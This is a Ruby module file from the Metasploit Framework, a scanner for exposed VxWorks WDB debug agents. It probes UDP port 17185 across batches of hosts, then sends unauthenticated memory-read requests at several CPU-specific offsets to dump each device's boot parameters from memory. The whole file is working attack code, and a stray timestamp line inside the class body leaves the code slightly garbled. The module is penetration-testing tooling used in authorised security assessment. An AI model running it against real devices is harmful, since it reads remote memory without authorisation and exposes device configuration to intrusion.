metasploit-framework/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb

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##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::WDBRPC
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'VxWorks WDB Agent Boot Parameter Scanner',
'Description' => 'Scan for exposed VxWorks wdbrpc daemons and dump the boot parameters from memory',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html'],
['US-CERT-VU', '362332']
]
)
register_options(
[
OptInt.new('BATCHSIZE', [true, 'The number of hosts to probe in each set', 256]),
Opt::RPORT(17185)
], self.class)
end
# Define our batch size
def run_batch_size
datastore['BATCHSIZE'].to_i
end
# Operate on an entire batch of hosts at once
def run_batch(batch)
begin
udp_sock = nil
idx = 0
udp_sock = Rex::Socket::Udp.create(
{
'Context' => {'Msf' => framework, 'MsfExploit' => self}
}
)
add_socket(udp_sock)
@udp_sock = udp_sock
batch.each do |ip|
begin
udp_sock.sendto(create_probe(ip), ip, datastore['RPORT'].to_i, 0)
rescue ::Interrupt
raise $!
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
nil
end
if (idx % 10 == 0)
while (r = udp_sock.recvfrom(65535, 0.01) and r[1])
parse_reply(r)
end
end
idx += 1
end
cnt = 0
del = 10
sts = Time.now.to_i
while (r = udp_sock.recvfrom(65535, del) and r[1])
parse_reply(r)
# Prevent an indefinite loop if the targets keep replying
cnt += 1
break if cnt > run_batch_size
# Escape after 15 seconds regardless of batch size
break if ((sts + 15) < Time.now.to_i)
del = 1.0
end
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_status("Unknown error: #{e.class} #{e}")
ensure
udp_sock.close if udp_sock
end
end
#
# The response parsers
#
def parse_reply(pkt)
return if not pkt[1]
if(pkt[1] =~ /^::ffff:/)
pkt[1] = pkt[1].sub(/^::ffff:/, '')
end
data = pkt[0]
# Bare RPC response
if data.length == 24
ecode = data[20,4].unpack("N")[0]
emesg = "unknown"
case ecode
when 3
# Should not be hit
emesg = "Device requires the VxWorks 5 WDB protocol"
when 5
emesg = "Device failed to parse the probe"
end
print_status("#{pkt[1]} Error: code=#{ecode} #{emesg}")
return
end
if data.length < 80
print_status("#{pkt[1]}: Unknown response #{data.unpack("H*")[0]}")
return
end
# Memory dump response
if data[48,64] =~ /^.{1,16}\(\d+,\d+\)/
buff = data[48, data.length-48]
boot,left = buff.split("\x00", 2)
print_status("#{pkt[1]}: BOOT> #{boot}")
report_note(
:host => pkt[1],
:port => datastore['RPORT'],
:proto => 'udp',
:type => 'vxworks.bootline',
:data => {:bootline => boot },
:update => :unique_data
)
return
end
res = wdbrpc_parse_connect_reply(data)
if res[:rt_membase]
print_status("#{pkt[1]}: #{res[:rt_vers]} #{res[:rt_bsp_name]} #{res[:rt_bootline]}")
report_note(
:host => pkt[1],
:port => datastore['RPORT'],
:proto => 'udp',
:type => 'vxworks.target_info',
:data => res,
:update => :unique
)
# Send the memory dump request for the bootline. Theoretically we can infer the correct
# location from the cpu type and BSP name, but these are tough to categorize and there
# is no harm in trying multiple offsets
# Most common mapping is 0x700 (M68k, ARM, etc)
@udp_sock.sendto(wdbrpc_request_memread(res[:rt_membase] + 0x700, 512), pkt[1], datastore['RPORT'].to_i, 0)
# PowerPC uses 0x4200
@udp_sock.sendto(wdbrpc_request_memread(res[:rt_membase] + 0x4200, 512), pkt[1], datastore['RPORT'].to_i, 0)
# PC x86 uses 0x1200
@udp_sock.sendto(wdbrpc_request_memread(res[:rt_membase] + 0x1200, 512), pkt[1], datastore['RPORT'].to_i, 0)
# SPARC-lite uses 0x600
@udp_sock.sendto(wdbrpc_request_memread(res[:rt_membase] + 0x600, 512), pkt[1], datastore['RPORT'].to_i, 0)
end
end
def create_probe(ip)
wdbrpc_request_connect(ip)
end
end